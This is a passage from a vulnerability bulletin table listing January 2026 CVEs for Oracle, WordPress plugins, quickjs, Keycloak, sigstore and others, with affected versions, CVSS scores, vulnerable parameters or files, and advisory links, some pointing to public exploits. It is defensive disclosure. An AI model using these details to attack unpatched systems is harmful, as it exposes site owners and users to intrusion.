| Oracle Corporation--Oracle Solaris | Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystems). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.0 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H). | 2026-01-20 | 5 | CVE-2026-21942 | Oracle Advisory |
| Oracle Corporation--Oracle Utilities Application Framework | Vulnerability in the Oracle Utilities Application Framework product of Oracle Utilities Applications (component: General). Supported versions that are affected are 4.4.0.3.0, 4.5.0.0.0, 4.5.0.1.1, 4.5.0.1.3, 4.5.0.2.0, 25.4 and 25.10. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Utilities Application Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Utilities Application Framework, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Utilities Application Framework accessible data as well as unauthorized read access to a subset of Oracle Utilities Application Framework accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 5.4 | CVE-2026-21924 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N). | 2026-01-20 | 6 | CVE-2026-21963 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N). | 2026-01-20 | 6 | CVE-2026-21985 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle VM VirtualBox accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 4.6 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:L). | 2026-01-20 | 4.6 | CVE-2026-21981 | Oracle Advisory |
| Oracle Corporation--Oracle Workflow | Vulnerability in the Oracle Workflow product of Oracle E-Business Suite (component: Workflow Loader). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Workflow. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Workflow accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N). | 2026-01-20 | 4.9 | CVE-2026-21959 | Oracle Advisory |
| Oracle Corporation--PeopleSoft Enterprise HCM Human Resources | Vulnerability in the PeopleSoft Enterprise HCM Human Resources product of Oracle PeopleSoft (component: Company Dir / Org Chart Viewer, Employee Snapshot). The supported version that is affected is 9.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise HCM Human Resources. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise HCM Human Resources, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise HCM Human Resources accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise HCM Human Resources accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 6.1 | CVE-2026-21961 | Oracle Advisory |
| Oracle Corporation--PeopleSoft Enterprise PeopleTools | Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Portal). Supported versions that are affected are 8.60, 8.61 and 8.62. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 6.1 | CVE-2026-21938 | Oracle Advisory |
| Oracle Corporation--PeopleSoft Enterprise PeopleTools | Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Integration Broker). Supported versions that are affected are 8.60, 8.61 and 8.62. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 6.1 | CVE-2026-21951 | Oracle Advisory |
| Oracle Corporation--PeopleSoft Enterprise PeopleTools | Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Push Notifications). Supported versions that are affected are 8.60, 8.61 and 8.62. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N). | 2026-01-20 | 5.4 | CVE-2026-21934 | Oracle Advisory |
| Oracle Corporation--PeopleSoft Enterprise SCM Purchasing | Vulnerability in the PeopleSoft Enterprise SCM Purchasing product of Oracle PeopleSoft (component: Purchasing). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise SCM Purchasing. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise SCM Purchasing accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise SCM Purchasing accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N). | 2026-01-20 | 5.4 | CVE-2026-21971 | Oracle Advisory |
| ostin654--JustClick registration plugin | The JustClick registration plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 0.1. This is due to insufficient input sanitization and output escaping on the `PHP_SELF` server variable. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-24 | 6.1 | CVE-2025-13676 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f1420ec8-55e4-448d-8230-228d1e566b97?source=cve https://plugins.trac.wordpress.org/browser/justclick-subscriber/trunk/justclick.php#L154 https://plugins.trac.wordpress.org/browser/justclick-subscriber/tags/0.1/justclick.php#L154 |
| Palantir--com.palantir.aries:aries | A vulnerability in Palantir's Aries service allowed unauthenticated access to log viewing and management functionality on Apollo instances using default configuration. The defect resulted in both authentication and authorization checks being bypassed, potentially allowing any network-accessible client to view system logs and perform operations without valid credentials. No evidence of exploitation was identified during the vulnerability window. | 2026-01-22 | 6.6 | CVE-2025-68609 | https://palantir.safebase.us/?tcuUid=955a313a-1735-48a6-9fb4-e10404f14eb5 |
| pdfcrowd--Save as PDF Plugin by PDFCrowd | The Save as PDF Plugin by PDFCrowd plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'options' parameter in all versions up to, and including, 4.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. NOTE: Successful exploitation of this vulnerability requires that the PDFCrowd API key is blank (also known as "demo mode", which is the default configuration when the plugin is installed) or known. | 2026-01-24 | 6.1 | CVE-2026-0862 | https://www.wordfence.com/threat-intel/vulnerabilities/id/74172fcb-7428-464a-89f1-f1f3af50e361?source=cve https://plugins.trac.wordpress.org/changeset/3438577/save-as-pdf-by-pdfcrowd |
| peachpay--PeachPay Payments & Express Checkout for WooCommerce (supports Stripe, PayPal, Square, Authorize.net) | The PeachPay - Payments & Express Checkout for WooCommerce (supports Stripe, PayPal, Square, Authorize.net) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ConvesioPay webhook REST endpoint in all versions up to, and including, 1.119.8. This makes it possible for unauthenticated attackers to modify the status of arbitrary WooCommerce orders. | 2026-01-20 | 5.3 | CVE-2025-14978 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5480a151-3e3a-46ba-9712-6c61fba06812?source=cve https://plugins.trac.wordpress.org/browser/peachpay-for-woocommerce/tags/1.119.5/core/payments/convesiopay/routes/class-peachpay-convesiopay-webhook.php#L33 |
| PHPGurukul--News Portal | A vulnerability was identified in PHPGurukul News Portal 1.0. The affected element is an unknown function of the file /admin/add-subadmins.php of the component Add Sub-Admin Page. Such manipulation leads to improper authorization. The attack can be launched remotely. The exploit is publicly available and might be used. | 2026-01-19 | 6.3 | CVE-2026-1141 | VDB-341733 (PHPGurukul News Portal Add Sub-Admin add-subadmins.php improper authorization); CTI Indicators (IOB, IOC, TTP, IOA); Submit #735483 (PHPGurukul News Portal Project in PHP and MySql 1.0 Improper Access Controls); https://github.com/Asim-QAZi/BrokenAccessControl-News-Portal-Project-in-PHP-and-MySQL-in-PHPGurukul https://phpgurukul.com/ |
| PHPGurukul--News Portal | A security flaw has been discovered in PHPGurukul News Portal 1.0. The impacted element is an unknown function. Performing a manipulation results in cross-site request forgery. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. | 2026-01-19 | 4.3 | CVE-2026-1142 | VDB-341734 (PHPGurukul News Portal cross-site request forgery); CTI Indicators (IOB, IOC); Submit #735498 (PHPGurukul News Portal Project in PHP and MySql 1.0 Cross-Site Request Forgery); https://github.com/Asim-QAZi/CSRF-Add-Subadmin-in-News-Portal-Project-in-PHP-and-MySql-in-PHPGurukul https://phpgurukul.com/ |
| plugins360--All-in-One Video Gallery | The All-in-One Video Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `ajax_callback_create_bunny_stream_video`, `ajax_callback_get_bunny_stream_video`, and `ajax_callback_delete_bunny_stream_video` functions in all versions up to, and including, 4.6.4. This makes it possible for unauthenticated attackers to create and delete videos on the Bunny Stream CDN associated with the victim's account, provided they can obtain a valid nonce which is exposed in public player templates. | 2026-01-23 | 6.5 | CVE-2025-14947 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bedfb712-faf6-4131-b254-e6d7c367f49f?source=cve https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/trunk/includes/init.php#L373 https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/trunk/public/bunny-stream.php#L131 https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/trunk/public/bunny-stream.php#L285 https://plugins.trac.wordpress.org/changeset/3441541/ |
| plugins360--All-in-One Video Gallery | The All-in-One Video Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_callback_store_user_meta() function in versions 4.1.0 to 4.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary string-based user meta keys for their own account. | 2026-01-24 | 4.3 | CVE-2025-15516 | https://www.wordfence.com/threat-intel/vulnerabilities/id/218e4ed5-661b-49e1-8b23-457a93fd53fa?source=cve https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/tags/4.6.4/admin/admin.php#L1062 |
| pytest--pytest | pytest through 9.0.2 on UNIX relies on directories with the /tmp/pytest-of-{user} name pattern, which allows local users to cause a denial of service or possibly gain privileges. | 2026-01-22 | 6.8 | CVE-2025-71176 | https://github.com/pytest-dev/pytest/issues/13669 https://www.openwall.com/lists/oss-security/2026/01/21/5 |
| quickjs-ng--quickjs | A vulnerability was detected in quickjs-ng quickjs up to 0.11.0. Affected is an unknown function of the file quickjs.c of the component Atomics Ops Handler. The manipulation results in use after free. The attack can be executed remotely. The exploit is now public and may be used. The patch is identified as ea3e9d77454e8fc9cb3ef3c504e9c16af5a80141. Applying a patch is advised to resolve this issue. | 2026-01-19 | 6.3 | CVE-2026-1144 | VDB-341737 (quickjs-ng quickjs Atomics Ops quickjs.c use after free); CTI Indicators (IOB, IOC, IOA); Submit #735537 (quickjs-ng quickjs v0.11.0 Use After Free); Submit #735538 (quickjs-ng quickjs v0.11.0 Use After Free, duplicate); https://github.com/quickjs-ng/quickjs/issues/1301 https://github.com/quickjs-ng/quickjs/pull/1303 https://github.com/quickjs-ng/quickjs/issues/1302 https://github.com/quickjs-ng/quickjs/commit/ea3e9d77454e8fc9cb3ef3c504e9c16af5a80141 |
| quickjs-ng--quickjs | A flaw has been found in quickjs-ng quickjs up to 0.11.0. Affected by this vulnerability is the function js_typed_array_constructor_ta of the file quickjs.c. This manipulation causes heap-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been published and may be used. Patch name: 53aebe66170d545bb6265906fe4324e4477de8b4. It is suggested to install a patch to address this issue. | 2026-01-19 | 6.3 | CVE-2026-1145 | VDB-341738 (quickjs-ng quickjs quickjs.c js_typed_array_constructor_ta heap-based overflow); CTI Indicators (IOB, IOC, IOA); Submit #735539 (quickjs-ng quickjs v0.11.0 Heap-based Buffer Overflow); https://github.com/quickjs-ng/quickjs/issues/1305 https://github.com/quickjs-ng/quickjs/pull/1306 https://github.com/quickjs-ng/quickjs/issues/1305#issue-3785444372 https://github.com/paralin/quickjs/commit/53aebe66170d545bb6265906fe4324e4477de8b4 |
| rebelcode--RSS Aggregator RSS Import, News Feeds, Feed to Post, and Autoblogging | The RSS Aggregator - RSS Import, News Feeds, Feed to Post, and Autoblogging plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp-rss-aggregator' shortcode in all versions up to, and including, 5.0.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-23 | 6.4 | CVE-2025-14745 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dd201949-d3a1-4fdb-bf98-252fbfd59380?source=cve https://plugins.trac.wordpress.org/browser/wp-rss-aggregator/trunk/core/src/Renderer.php#L209 https://plugins.trac.wordpress.org/changeset/3439384/wp-rss-aggregator/trunk/core/src/Renderer.php |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in the keycloak-services component of Keycloak. This vulnerability allows the issuance of access and refresh tokens for disabled users, leading to unauthorized use of previously revoked privileges, via a business logic vulnerability in the Token Exchange implementation when a privileged client invokes the token exchange flow. | 2026-01-21 | 6.5 | CVE-2025-14559 | https://access.redhat.com/security/cve/CVE-2025-14559 RHBZ#2421711 |
| Red Hat--Red Hat Build of Keycloak | A flaw was identified in Keycloak's OpenID Connect Dynamic Client Registration feature when clients authenticate using private_key_jwt. The issue allows a client to specify an arbitrary jwks_uri, which Keycloak then retrieves without validating the destination. This enables attackers to coerce the Keycloak server into making HTTP requests to internal or restricted network resources. As a result, attackers can probe internal services and cloud metadata endpoints, creating an information disclosure and reconnaissance risk. | 2026-01-20 | 5.8 | CVE-2026-1180 | https://access.redhat.com/security/cve/CVE-2026-1180 RHBZ#2430781 |
| robiulawal40--Alpha Blocks | The Alpha Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'alpha_block_css' parameter in all versions up to, and including, 1.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 6.4 | CVE-2025-14985 | https://www.wordfence.com/threat-intel/vulnerabilities/id/745dcc4c-1c52-4ac7-9ac6-033770282a3b?source=cve https://plugins.trac.wordpress.org/browser/alpha-blocks/tags/1.5.0/class/block_inline_style.php#L175 |
| rtowebsites--AdminQuickbar | The AdminQuickbar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.9.3. This is due to missing or incorrect nonce validation on the 'saveSettings' and 'renamePost' AJAX actions. This makes it possible for unauthenticated attackers to modify plugin settings and update post titles via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2025-14630 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bb70ad52-b964-4c56-98a2-06be375a79af?source=cve https://plugins.trac.wordpress.org/browser/adminquickbar/tags/1.9.3/Lib/AdminQuickbar.php#L88 https://plugins.trac.wordpress.org/browser/adminquickbar/tags/1.9.3/Lib/Sidebar.php#L386 https://plugins.trac.wordpress.org/browser/adminquickbar/trunk/Lib/AdminQuickbar.php#L88 https://plugins.trac.wordpress.org/browser/adminquickbar/trunk/Lib/Sidebar.php#L386 |
| Sangfor--Operation and Maintenance Security Management System | A security flaw has been discovered in Sangfor Operation and Maintenance Security Management System up to 3.0.12. This affects the function edit_pwd_mall of the file /fort/login/edit_pwd_mall. The manipulation of the argument flag results in weak password recovery. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-22 | 5.3 | CVE-2026-1325 | VDB-342301 (Sangfor Operation and Maintenance Security Management System edit_pwd_mall password recovery); CTI Indicators (IOB, IOC, TTP, IOA); Submit #736208 (Sangfor Operation and Maintenance Security Management System (OSM / 运维安全管理系统, "Operation and Maintenance Security Management System") 3.0.12 Unauthenticated Arbitrary Password Reset); https://github.com/LX-LX88/cve/issues/21 |
| satollo--Newsletter Send awesome emails from WordPress | The Newsletter - Send awesome emails from WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 9.1.0. This is due to missing or incorrect nonce validation on the hook_newsletter_action() function. This makes it possible for unauthenticated attackers to unsubscribe newsletter subscribers via a forged request granted they can trick a logged-in user into performing an action such as clicking on a link. | 2026-01-20 | 4.3 | CVE-2026-1051 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8de2156f-5087-4c16-8e5d-93b5c72ec536?source=cve https://plugins.trac.wordpress.org/browser/newsletter/tags/9.1.0/unsubscription/unsubscription.php#L141 |
| sauravrox--Set Bulk Post Categories | The Set Bulk Post Categories plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing nonce validation on the bulk category update functionality. This makes it possible for unauthenticated attackers to modify post categories in bulk via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2026-1081 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9503f908-ead2-4c34-89b9-1e2348b90f3c?source=cve https://plugins.trac.wordpress.org/browser/set-bulk-post-categories/trunk/set-bulk-categories.php#L36 https://plugins.trac.wordpress.org/browser/set-bulk-post-categories/tags/1.1/set-bulk-categories.php#L36 |
| Seacms--Seacms | SeaCMS 11.1 contains a stored cross-site scripting vulnerability in the checkuser parameter of the admin settings page. Attackers can inject malicious JavaScript payloads that will execute in users' browsers when the page is loaded. | 2026-01-25 | 6.4 | CVE-2020-36932 | ExploitDB-49251 Official Seacms Product Homepage VulnCheck Advisory: Seacms 11.1 - 'checkuser' Stored XSS |
| shahinurislam--Meta-box GalleryMeta | The Meta-box GalleryMeta plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'mb_gallery' custom post type in all versions up to, and including, 3.0.1. This makes it possible for authenticated attackers, with Author-level access and above, to create and publish galleries. | 2026-01-24 | 4.3 | CVE-2026-0687 | https://www.wordfence.com/threat-intel/vulnerabilities/id/872c61aa-c95c-4b86-8e39-8112bb117a0b?source=cve https://plugins.trac.wordpress.org/browser/meta-box-gallerymeta/tags/3.0.1/include/posttype.php#L29 https://plugins.trac.wordpress.org/browser/meta-box-gallerymeta/tags/3.0.1/gallerymetaboxes.php#L375 |
| shahinurislam--Meta-box GalleryMeta | The Meta-box GalleryMeta plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-24 | 4.4 | CVE-2026-1302 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bb9ae252-7e5f-4dc0-a162-100493b81980?source=cve https://plugins.trac.wordpress.org/browser/meta-box-gallerymeta/tags/3.0.1/templates/single-mb_gallery.php#L31 https://plugins.trac.wordpress.org/browser/meta-box-gallerymeta/tags/3.0.1/templates/single-mb_gallery.php#L33 https://plugins.trac.wordpress.org/browser/meta-box-gallerymeta/tags/3.0.1/gallerymetaboxes.php#L119 https://plugins.trac.wordpress.org/browser/meta-box-gallerymeta/tags/3.0.1/gallerymetaboxes.php#L314 |
| shazdeh--Administrative Shortcodes | The Administrative Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'login' and 'logout' shortcode attributes in all versions up to, and including, 0.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 6.4 | CVE-2026-1099 | https://www.wordfence.com/threat-intel/vulnerabilities/id/de931a65-c898-4b1d-99ce-20dd646bcbb0?source=cve https://plugins.trac.wordpress.org/browser/administrative-shortcodes/trunk/administrative-shortcodes.php#L196 https://plugins.trac.wordpress.org/browser/administrative-shortcodes/tags/0.3.4/administrative-shortcodes.php#L196 |
| sigstore--rekor | Rekor is a software supply chain transparency log. In versions 1.4.3 and below, the entry implementation can panic on attacker-controlled input when canonicalizing a proposed entry with an empty spec.message, causing a nil pointer dereference. Function validate() returns nil (success) when message is empty, leaving sign1Msg uninitialized, and Canonicalize() later dereferences v.sign1Msg.Payload. A malformed proposed entry of the cose/v0.0.1 type can cause a panic on a thread within the Rekor process. The thread is recovered so the client receives a 500 error message and service still continues, so the availability impact of this is minimal. This issue has been fixed in version 1.5.0. | 2026-01-22 | 5.3 | CVE-2026-23831 | https://github.com/sigstore/rekor/security/advisories/GHSA-273p-m2cw-6833 https://github.com/sigstore/rekor/commit/39bae3d192bce48ef4ef2cbd1788fb5770fee8cd https://github.com/sigstore/rekor/releases/tag/v1.5.0 |
| sigstore--rekor | Rekor is a software supply chain transparency log. In versions 1.4.3 and below, attackers can trigger SSRF to arbitrary internal services because /api/v1/index/retrieve supports retrieving a public key via user-provided URL. Since the SSRF only can trigger GET requests, the request cannot mutate state. The response from the GET request is not returned to the caller so data exfiltration is not possible. A malicious actor could attempt to probe an internal network through Blind SSRF. The issue has been fixed in version 1.5.0. To workaround this issue, disable the search endpoint with --enable_retrieve_api=false. | 2026-01-22 | 5.3 | CVE-2026-24117 | https://github.com/sigstore/rekor/security/advisories/GHSA-4c4x-jm2x-pf9j https://github.com/sigstore/rekor/commit/60ef2bceba192c5bf9327d003bceea8bf1f8275f https://github.com/sigstore/rekor/releases/tag/v1.5.0 |
| sigstore--sigstore | sigstore framework is a common go library shared across sigstore services and clients. In versions 1.10.3 and below, the legacy TUF client (pkg/tuf/client.go) supports caching target files to disk. It constructs a filesystem path by joining a cache base directory with a target name sourced from signed target metadata; however, it does not validate that the resulting path stays within the cache base directory. A malicious TUF repository can trigger arbitrary file overwriting, limited to the permissions that the calling process has. Note that this should only affect clients that are directly using the TUF client in sigstore/sigstore or are using an older version of Cosign. Public Sigstore deployment users are unaffected, as TUF metadata is validated by a quorum of trusted collaborators. This issue has been fixed in version 1.10.4. As a workaround, users can disable disk caching for the legacy client by setting SIGSTORE_NO_CACHE=true in the environment, migrate to https://github.com/sigstore/sigstore-go/tree/main/pkg/tuf, or upgrade to the latest sigstore/sigstore release. | 2026-01-23 | 5.8 | CVE-2026-24137 | https://github.com/sigstore/sigstore/security/advisories/GHSA-fcv2-xgw5-pqxf https://github.com/sigstore/sigstore/commit/8ec410a2993ea78083aecf0e473a85453039496e https://github.com/sigstore/sigstore/releases/tag/v1.10.4 |
| SourceCodester--E-Learning System | A flaw has been found in SourceCodester E-Learning System 1.0. This impacts an unknown function of the file /admin/modules/lesson/index.php of the component Lesson Module Handler. Executing a manipulation of the argument Title/Description can lead to basic cross site scripting. The attack can be executed remotely. The exploit has been published and may be used. | 2026-01-19 | 4.3 | CVE-2026-1154 | VDB-341747 (SourceCodester E-Learning System Lesson index.php cross site scripting); CTI Indicators (IOB, IOC, TTP, IOA); Submit #735855 (SourceCodester E-Learning System (CAIWL) 1.0 Stored HTML Injection Vulnerability); https://gist.github.com/0xCaptainFahim/dada955760b424a851de12bccadee997 https://www.sourcecodester.com/ |
| SourceCodester--Patients Waiting Area Queue Management System | A vulnerability was determined in SourceCodester/Patrick Mvuma Patients Waiting Area Queue Management System 1.0. This vulnerability affects unknown code. Executing a manipulation can lead to cross-site request forgery. It is possible to launch the attack remotely. | 2026-01-19 | 4.3 | CVE-2026-1148 | VDB-341741 (SourceCodester/Patrick Mvuma Patients Waiting Area Queue Management System cross-site request forgery); CTI Indicators (IOB, IOC); Submit #735545 (Patrick Mvuma Patients Waiting Area Queue Management System 1.0 Cross-Site Request Forgery) |
| specialk--Head Meta Data | The Head Meta Data plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'head-meta-data' post meta field in all versions up to, and including, 20251118 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-20 | 6.4 | CVE-2026-0608 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9592bb6d-8e1d-4c89-addd-11c07272a628?source=cve https://plugins.trac.wordpress.org/changeset?old_path=/head-meta-data/tags/20251118&new_path=/head-meta-data/tags/20260105 |
| Spring--Spring Security | The fix applied in CVE-2025-22228 inadvertently broke the timing attack mitigation implemented in DaoAuthenticationProvider. This can allow attackers to infer valid usernames or other authentication behavior via response-time differences under certain configurations. | 2026-01-22 | 5.3 | CVE-2025-22234 | Spring Security Advisory: CVE-2025-22234 |
| stefanristic--Simple Crypto Shortcodes | The Simple Crypto Shortcodes plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.2. This is due to missing nonce validation on the scs_backend function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2025-14903 | https://www.wordfence.com/threat-intel/vulnerabilities/id/18bcd2ad-1989-4e2b-b82e-fddc4201c5a6?source=cve https://plugins.trac.wordpress.org/browser/simple-crypto-shortcodes/tags/1.0.2/simple_crypto_shortcodes.php#L46 https://plugins.trac.wordpress.org/browser/simple-crypto-shortcodes/tags/1.0.2/simple_crypto_shortcodes.php#L54 |
| stellarwp--The Events Calendar | The The Events Calendar plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'start_migration', 'cancel_migration', and 'revert_migration' functions in all versions up to, and including, 6.15.13. This makes it possible for authenticated attackers, with subscriber level access and above, to start, cancel, or revert the Custom Tables V1 database migration, including dropping the custom database tables entirely via the revert action. | 2026-01-20 | 5.4 | CVE-2025-15043 | https://www.wordfence.com/threat-intel/vulnerabilities/id/346a5b00-fb76-4413-a935-a2df4dc51984?source=cve https://plugins.trac.wordpress.org/changeset?old_path=/the-events-calendar/tags/6.15.13&new_path=/the-events-calendar/tags/6.15.13.1 |
